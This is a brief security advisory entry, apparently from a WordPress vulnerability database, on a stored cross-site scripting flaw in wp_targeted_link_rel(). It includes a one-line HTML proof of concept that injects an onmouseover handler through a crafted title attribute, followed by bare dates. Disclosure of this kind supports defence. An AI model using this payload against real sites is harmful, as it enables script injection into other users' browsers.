The function wp_targeted_link_rel() can be used in a particular way to result in a Stored Cross-Site Scripting (XSS) vulnerability.
<a href="#" title=" target='abc' rel= onmouseover=alert(/XSS/) ">This is a PoC for a Stored XSS</a>
2019-12-13 (about 3 years ago)
2019-12-13 (about 3 years ago)
2021-06-29 (about 1 years ago)